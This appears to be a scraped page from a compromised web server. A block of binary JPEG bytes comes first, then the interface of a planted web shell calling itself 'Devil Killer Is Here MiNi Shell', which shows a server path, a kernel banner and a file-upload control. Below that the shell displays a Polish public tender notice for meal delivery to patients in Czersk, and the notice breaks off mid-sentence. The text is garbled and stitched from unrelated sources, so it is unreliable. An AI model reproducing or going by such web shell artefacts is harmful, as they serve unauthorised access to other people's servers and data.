JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220810/0030026001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa zakupu i dostawy żywności na bazie kuchni dostawcy dla pacjentów Krajowego Ośrodka Zapobiegania Zachowaniom Dyssocjalnym - Oddział Zamiejscowy w Czersku II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK ZAPOBIEGANIA ZACHOWANIOM DYSSOCJALNYM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 147060927</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zalesie 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gostynin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 235 71 54</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 235 71 55</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@kozzd-gostynin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kozzd-gostynin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa zakupu i dostawy żywności na bazie kuchni dostawcy dla pacjentów Krajowego Ośrodka Zapobiegania Zachowaniom Dyssocjalnym - Oddział Zamiejscowy w Czersku II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-611d9a9e-187a-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00300260</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00023770/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Usługa zakupu i dostawy żywności na bazie kuchni dostawcy dla pacjentów Krajowego Ośrodka Zapobiegania Zachowaniom Dyssocjalnym - Oddział Zamiejscowy w Czersku II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> BIP: http://kozzd-gostynin.bip.eur.pl; Platforma: https://kozzd-gostynin.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">BIP: http://kozzd-gostynin.bip.eur.pl; Platforma: https://kozzd-gostynin.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne, które muszą<br/>spełniać urządzenia informatyczne w celu korzystania z Platformy przetargowej opisane zostały przez Zamawiającego w<br/>Specyfikacji Warunków Zamówienia - pkt. VIII ppkt. 4 wskazanego dokumentu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula dotyczy obowiązku informacyjnego wynikającego z art. 13 RODO<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia Dyrektywy 95/46/WE -<br/>znajduje się w dokumentacji postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TPNO/9/2022/C</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest przygotowywanie i dostarczanie posiłków do Oddziału Zamiejscowego Zamawiającego<br/>zlokalizowanego w miejscowości Czersk, woj. pomorskie, w okresie od dnia 01.09.2022r. do dnia 31.08.2023r., według 4<br/>jadłospisów przygotowanych przez Zamawiającego, które załączone są do specyfikacji warunków zamówienia i będą<br/>obowiązywać w terminach podanych poniżej:<br/>Lato: od dnia 1 lipca do dnia 30 września.<br/>Jesień: od dnia 1 października do dnia 31 grudnia,<br/>Zima: od dnia 1 stycznia do dnia 31 marca,<br/>Wiosna: od dnia 1 kwietnia do dnia 30 czerwca,<br/>2. Zamawiający zastrzega sobie możliwość zmiany jadłospisu na równoważny. Zmiana jadłospisu na równoważny może<br/>nastąpić w szczególności w przypadku pogorszenia jakości dostarczanych posiłków, w tym ich smaku i wyglądu, a także<br/>wprowadzania przez Wykonawcę produktów złej jakości mających wpływ na jakość świadczonej usługi, a także w<br/>przypadku wycofania produktów, z których posiłki będą przygotowywane.- Jadłospis równoważny zostanie przekazany Wykonawcy z dwutygodniowym wyprzedzeniem.<br/>3. W sytuacji konieczności wprowadzenia innego rodzaju diet niż wymienione w jadłospisach, Wykonawca będzie<br/>zobowiązany do ich opracowania i dostarczania w ramach obowiązującej umowy – z tego tytułu Wykonawcy nie przysługuje<br/>dodatkowe wynagrodzenie.<br/>4. Przygotowywanie posiłków odbywać się będzie z własnych produktów Wykonawcy, z uwzględnieniem diet stosowanych<br/>w Ośrodku oraz z zachowaniem wymaganej gramatury produktów.<br/>5. Liczba przygotowywanych posiłków będzie przedstawiona przez Zamawiającego w grafiku jednotygodniowym. Na dzień<br/>ogłoszenia postępowania liczba leczonych pacjentów wynosi 15 osób. Zamawiający informuje, iż w trakcie realizacji<br/>zamówienia liczba ta może ulec zmianie w zależności od rzeczywistego stanu pacjentów.<br/>6. Wykonawca zobowiązany jest dostarczyć każdego dnia, bez względu na święta i inne uroczystości zamówione posiłki na<br/>własny koszt i ryzyko do Oddziału Zamiejscowego Krajowego Ośrodka Zapobiegania Zachowaniom Dyssocjalnym w<br/>Czersku, ul. Dworcowa 29, woj. pomorskie.<br/>7. Posiłki dostarczane będą w oddzielnych opakowaniach jednorazowych tzn. każdy pacjent otrzyma swoje porcje w<br/>przeznaczonym dla siebie opakowaniu, przy czym Zamawiający zastrzega, iż opakowania używane przez Wykonawcę<br/>muszą posiadać stosowne atesty pozwalające na kontakt opakowania z żywnością – opakowania jednorazowe do<br/>pakowania posiłków zapewni Wykonawca.<br/>- Zamawiający wymaga, aby posiłki pakowane były w jednorazowe opakowania zawierające jedną porcję posiłku oraz<br/>umieszczane były w torbach termoizolacyjnych, oddzielnych dla dań gorących i oddzielnych dla pozostałych dań<br/>zapewniających prawidłowe warunki higieniczne i odpowiednią temperaturę potraw,<br/>- Zamawiający wymaga, aby w celu zapewnienia odpowiedniej temperatury posiłków, surówki dostarczać w oddzielnych,<br/>szczelnie zamkniętych opakowaniach jednorazowych, tzn. każdy pacjent otrzyma swoją porcję surówki w przeznaczonym<br/>dla siebie opakowaniu.<br/>8. Napoje gorące dostarczane będą w odpowiednich termosach. Termosy te są własnością Wykonawcy. Termosy muszą<br/>zapewniać utrzymanie optymalnej temperatury napojów gorących podczas transportu z kuchni Wykonawcy do siedziby<br/>Zamawiającego.<br/>9. Odbiór, mycie, wyparzanie i dezynfekcja termosów potrzebnych do świadczenia usługi objętej umową, należy do<br/>Wykonawcy. Zamawiający ma prawo do kontroli zapisów mycia i dezynfekcji termosów prowadzonych<br/>w kuchni Wykonawcy.<br/>10. Utylizacja opakowań stosowanych przez Wykonawcę do pakowania posiłków leży po stronie Zamawiającego.<br/>11. Dostawy posiłków odbywać się będą w ściśle ustalonych godzinach, tj.:<br/>Śniadanie - godzina 7.30<br/>Obiad wraz z kolacją - godzina 12.45<br/>- Zamawiający nie dopuszcza zmiany godzin dostaw posiłków.<br/>12. Posiłki i napoje dostarczane w ramach podpisanej umowy muszą być dostarczane do wyznaczonego punktu<br/>dystrybucyjnego w budynku Oddziału Zamiejscowego w Czersku. Miejsce to wskazane będzie wybranemu Wykonawcy, z<br/>którym zostanie podpisana umowa.<br/>13. Dostarczane posiłki muszą być świeże, z terminem do spożycia oraz gorące, poza posiłkami, które co do zasady<br/>spożywane są na zimno.<br/>- Zamawiający wymaga zapewnienia określonej temperatury dowożonych posiłków, tj.:<br/>Śniadania: zupa 750C; napój gorący 800C,<br/>Obiad: zupa 750C; II danie 630C; ziemniaki/makarony/kasze 630C, sałatki/surówki 40C;<br/>Kolacja: dania na ciepło 630C<br/>14. Działalność, o której mowa powyżej nie będzie prowadzona w kuchni Zamawiającego. Realizacja świadczenia winna<br/>odbywać się w lokalu odpowiadającym wszelkim wymaganiom sanitarnym i budowlanym przewidzianym dla lokali, w których<br/>wykonywane są usługi w zakresie określonym niniejszym postępowaniem.<br/>15. Wykonawca zobowiązany jest zabezpieczyć we własnym zakresie niezbędne narzędzia, urządzenia, materiały, produkty<br/>oraz środki transportu potrzebne do realizacji usługi z należytą starannością i w sposób prawidłowy, zgodny z umową i<br/>obowiązującymi w tym zakresie przepisami prawa.<br/>16. Wykonawca zobowiązany jest zapewnić odpowiednie zasoby techniczne,<br/>a także personel posiadający zdolności, doświadczenie oraz wiedzę w zakresie niezbędnym do realizacji zamówienia.<br/>17. Posiłki muszą być przygotowywane w pomieszczeniach gastronomicznych i przewożone środkiem transportu<br/>spełniającym wymagania higieniczno-sanitarne.<br/>18. Wykonawca jest zobowiązany do wykonywania przedmiotu umowy<br/>z należytą starannością i zachowaniem wszelkich norm i standardów obowiązujących przy świadczeniu usługi objętej<br/>zamówieniem.<br/>19. Pracownicy Wykonawcy zajmujący się dowozem i dystrybucją posiłków zobowiązani są do zachowania czystego i<br/>schludnego wyglądu osobistego oraz posiadania aktualnych książeczek zdrowia.<br/>20. Wykonawca odpowiada za wszelkie szkody wynikające z realizacji zamówienia, w tym za narażenie bądź<br/>spowodowania utraty życia lub uszczerbku na zdrowiu osób trzecich w związku z realizacją zamówienia.<br/>21. W czasie dowożenia posiłków Wykonawca zobowiązany będzie do przestrzegania przepisów obowiązujących na terenie<br/>Ośrodka. Wykonawca,<br/>z którym Zamawiający podpisze umowę zostanie poinformowany o w/w przepisach.<br/>22. Wykonawca ponosi pełną odpowiedzialność za przestrzeganie przepisów obowiązujących na terenie Ośrodka przez<br/>zatrudnionych przez siebie pracowników.<br/>23. Zamawiający zastrzega sobie prawo do kontroli w zakresie:<br/>- zgodności dostarczanych posiłków z wymogami Zamawiającego pod względem wagowym,- weryfikacji odpowiedniej temperatury dostarczanych posiłków,<br/>- sprawdzania jakości dostarczanych posiłków.<br/>24. Zamawiający ma prawo do kontroli przez wyznaczoną osobę procesu przygotowania oraz samych posiłków pod<br/>względem ilościowym, jakościowym, dietetycznym i higienicznym oraz do kontroli pod względem higienicznym pojazdów do<br/>transportu żywności, jak również termosów i opakowań, w których żywność jest przewożona.<br/>25. Na Wykonawcy ciąży obowiązek pobrania próbek żywności, zgodnie<br/>z przepisami sanitarno – epidemiologicznymi.<br/>26. Wykonawca ponosi odpowiedzialność za szkody spowodowane niewłaściwym wykonaniem usługi, stwierdzone w<br/>wyniku kontroli właściwych organów, między innymi Stacji Sanitarno – Epidemiologicznej.<br/>27. Zamówienie realizowane będzie na zasadach i warunkach określonych w projektowanych postanowieniach umowy,<br/>które stanowią załącznik nr 8 do SWZ – warunki określone w tym dokumencie, który został załączony do specyfikacji<br/>warunków zamówienia stanowią jej integralną część. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert określony została przez Zamawiającego w pkt. XVIII Specyfikacji Warunków<br/>Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Możliwość odbioru resztek z żywienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia publicznego może ubiegać się Wykonawca, który spełnia warunki określone w art. 112 ust. 2<br/>Ustawy Pzp.<br/>2. W celu oceny zdolności Wykonawcy do należytego wykonania zamówienia, Zamawiający określa warunki udziału w<br/>postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>- Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>- Wykonawca przedstawi decyzję/opinię/zaświadczenie Sanepidu zezwalające na przygotowywanie posiłków w żywieniu<br/>zbiorowym oraz dokument z ostatniej kontroli sanitarnej przeprowadzonej przez odpowiednią Stację Sanitarno-<br/>Epidemiologiczną, sprawującą bieżący nadzór nad kuchnią – dokument z kontroli przeprowadzonej w roku 2022, w<br/>przypadku, gdy ostatnia kontrola odbyła się wcześniej, Wykonawca do złożonego dokumentu z tej kontroli zobowiązany<br/>będzie dołączyć stosowne oświadczenie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>- Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu<br/>w tym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>- Wykonawca przedstawi decyzję/opinię/zaświadczenie Sanepidu z ostatniej kontroli sanitarnej przeprowadzonej przez<br/>odpowiednią Stację Sanitarno-Epidemiologiczną, sprawującą bieżący nadzór nad środkiem transportu – dokument z kontroli<br/>przeprowadzonej w roku 2022, w przypadku, gdy ostatnia kontrola odbyła się wcześniej, Wykonawca do złożonego<br/>dokumentu z tej kontroli zobowiązany będzie dołączyć stosowne oświadczenie.<br/>- Spełnienie warunków określonych w pkt. 2) i 4) powyżej potwierdzać ma przygotowywanie oraz przewóz żywności przy<br/>zachowaniu warunków gwarantujących jej bezpieczeństwo, zgodnie z obowiązującymi w tym zakresie przepisami prawa.<br/>Wykonawca przedkładając wymagane dokumenty powinien potwierdzić spełnianie warunków dla kuchni i środka transportu<br/>związanych bezpośrednio z realizacją zamówienia objętego postępowaniem.<br/>3. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>4. Zamawiający dokona oceny spełniania warunków udziału<br/>w postępowaniu zgodnie z formułą „spełnia – nie spełnia” w oparciu<br/>o dokumenty i oświadczenia złożone przez Wykonawcę, z których będzie jednoznacznie wynikać, że Wykonawca spełnia<br/>warunki udziału<br/>w postępowaniu.<br/>5. Wykonawca może w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub jego części, polegać na<br/>zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej Podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca, który polega na zdolnościach<br/>lub sytuacji Podmiotów udostępniających zasoby, musi udowodnić Zamawiającemu, że realizując zamówienie będzie<br/>dysponował niezbędnymi zasobami tych Podmiotów poprzez złożenie wraz z ofertą zobowiązania Podmiotu<br/>udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia<br/>lub złożyć inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych Podmiotów.<br/>Zobowiązanie Podmiotu udostępniającego zasoby potwierdza, że stosunek łączący Wykonawcę z Podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: zakres dostępnych<br/>Wykonawcy zasobów Podmiotu udostępniającego zasoby, sposób i okres udostępnienia Wykonawcy i wykorzystania przez<br/>niego zasobów Podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia, czy i w jakim zakresie Podmiot<br/>udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności<br/>dotyczą.<br/>6. Wykorzystanie przez Wykonawcę Podmiotu trzeciego w celu potwierdzenia spełniania warunków udziału w postępowaniu<br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia odbywa się zgodnie z art. 119 Ustawy Pzp.<br/>7. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa Podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego Podmiotu<br/>podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten<br/>Podmiot innym Podmiotem lub Podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>- Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację Podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>Podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W przypadku polegania<br/>na zdolnościach lub sytuacji Podmiotów udostępniających zasoby, Wykonawca przedstawia, wraz z oświadczeniem o którym 